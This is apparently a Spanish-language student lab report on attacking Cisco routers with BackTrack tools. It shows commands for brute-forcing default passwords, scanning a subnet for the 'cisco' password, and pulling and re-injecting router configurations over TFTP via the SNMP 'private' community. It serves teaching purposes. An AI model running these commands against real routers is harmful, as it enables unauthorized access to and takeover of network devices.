trabajo seguridad

Upload: elias-cossio

Post on 13-Oct-2015

20 views

Category:

Documents


0 download

TRANSCRIPT

  • Santiago Sur Ingeniera en Telecomunicaciones,

    Conectividad y Redes

    Seguridad en Redes

    ATAQUES CON BACKTRACK

    Nombre Alumno (s): Elias Cossio

    Jorge Quezada

    Nombre Profesor: Rene Guerrero

    Fecha: 12 de noviembre de 2013

  • Cisco Auditing Tool

    La topologa que utilizaremos ser la siguiente.

    Cisco Auditing Tool (CAT) es una mini herramienta de auditora de seguridad. Analiza

    las vulnerabilidades ms comunes de los routers Cisco, como las contraseas por

    defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS.

    Incluye tambien soporte para dems plugins y el escaneo de mltiples hosts.

    Tras una previa configuracin de un router por defecto de sus contraseas lo que

    aremos ser descubrir la clave de acceso y asi poder cambiar el router a nuestro gusto.

  • Ahora vemos la ip de nuestro backtrack y probamos conectividad

    En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al

    men Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco

    Tools. Una vez que la ventana de la consola se haya cargado correctamente,

    podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro

    objetivo.

  • Backtrack trae unas contraseas por defecto configuradas, pero para darle ms

    posibilidades de encontrar la contrasea se puede editar un archivo e indicarle claves

    para buscar.

    Primero sacaremos la contrasea con las configuradas por defecto.

    Utilizamos la siguiente opcin:

    ./CAT h 192.168.1.1

  • Nos arroja como resultado que la contrasea arrojada fue cisco esta clave la probaremos despus haciendo un telnet desde aqu.

    Ahora editaremos el archivo.

  • Con el comando:

    Nano /pentest/cisco/cisco-auditing-tool/lists/passwords

    Una vez editado el archivo guardamos y utilizamos la siguiente secuencia para

    descubrir la contrasea:

    ./CAT -h 192.168.1.1 -a lists/passwords

  • Nos arroja la misma contrasea anterior cisco ahora vamos a probar si es la correcta realizando un telnet.

  • Cisco Passwd Scanner La topologa que utilizaremos para realizar las pruebas ser la siguiente

  • Cisco passwd scanner es una herramienta incluida en el grupo de vulnerabilidades

    Cisco. Su funcin principal es buscar en un rango de IP que an no han sido

    configurados correctamente y que por ende, tenga activada la contrasea por

    defecto en el equipo.

    Comenzamos abriendo la herramienta.

  • Nos aparecer un terminal como el siguiente

    La herramienta realizara un scanner sobre toda la red que se le indique verificando

    cuales routers existentes dentro de la red tienen activada la contrasea por defecto

    cisco. El scanneo se realiza a travs de un ataque de fuerza bruta de un solo intento, probando la palabra de cisco en cada uno de los routers encontrados. Si la conexin con la contrasea cisco es exitosa, la direccin del router ser listada en los resultados del comando.

  • El comando que utilizaremos ser el siguiente

    ./ciscos 192.168.1 3 t 10

  • Los resultados son escritos en un archivo de texto llamado cisco.txt que se ubica en la

    carpeta /pentest/cisco/ciscos.

  • Ahora probaremos los resultados realizando telnet a esas direcciones

  • Copy Router Config

    Consiste en tomar la configuracin (Running-config) de un router, y llevarla como un

    archivo, mediante tftp, hasta la mquina con la cual se est haciendo el ataque.

    La imagen muestra la topologa utilizada, donde la Nube representa la mquina

    desde donde se realizaron los ataques.

    Nota: Para realizar este ataque, se necesita tener configurado un servidor tftp, en este

    caso, en el equipo BACKTRACK.

  • La captura anterior muestra el men donde se encuentra la aplicacin para realizar el

    ataque: copy-router-config.

    En la captura anterior, se resalta, mediante un cuadro amarillo la lnea de comando

    para hacer efectivo el ataque: perl copy-router-config.pl 192.168.1.20 [IP ROUTER]

    192.167.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp

    configuradas en el router]

    Luego de procesar el ataque, el sistema enva un OK, indicando que fue realizado con

    xito.

  • En la captura anterior se ingresa al directorio que contiene los archivos que se han

    transferido mediante el protocolo TFTP. En este caso, el archivo de configuracin del

    Router atacado ha enviado el archivo pwnd-router.config.

  • Finalmente, al ingresar al archivo, se puede apreciar la configuracin del router. En los

    cuadros de color amarillo se destaca el hostname y la configuracin de la interfaz f 0/0

    que se configur para realizar el laboratorio. As se comprueba que, efectivamente, el

    ataque ha sido realizado con xito.

    Merge Router Config

    Es la operacin inversa al ataque anterior (Copy Router Config), y por lo general se

    trabaja con mbos. Consiste en modificar el archivo de configuracin que el router le

    entrega a BackTrack para luego volver a inyectarlo al mismo router, con una nueva configuracin.

    Se utiliz la misma topologa que en el ataque Copy Router Config.

  • Se han modificado algunos parmetros, por ejemplo, el hostname pasar de R1 a

    ROUTER_ATACADO; las interfaces tendrn ahora descripciones y finalmente se ha

    configurado una de las lneas vty con un password, adems de un mensaje banner.

  • La marca amarilla indica la aplicacin que se utilizar para el ataque: merge config

    router

  • La lnea de comando es la siguiente: perl merge-router-config.pl 192.168.1.20 [IP

    ROUTER] 192.168.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp

    configuradas en el router].

    Luego, el correspondiente OK para confirmar que el ataque ha sido realizado con

    xito.

  • Inmediatamente, en la consola del router aparece un mensaje indicando que se ha

    cargado una configuracin nueva a travs de la ip 192.168.1.10 (BACKTRACK) va tftp.

  • Finalmente, se procede a revisar la configuracin del router, y efectivamente, los

    cambios realizados en el archivo se han cargado con xito. Se aprecia el cambio de la

    lnea vty 0, la descripcin de la interfaz, el banner motd.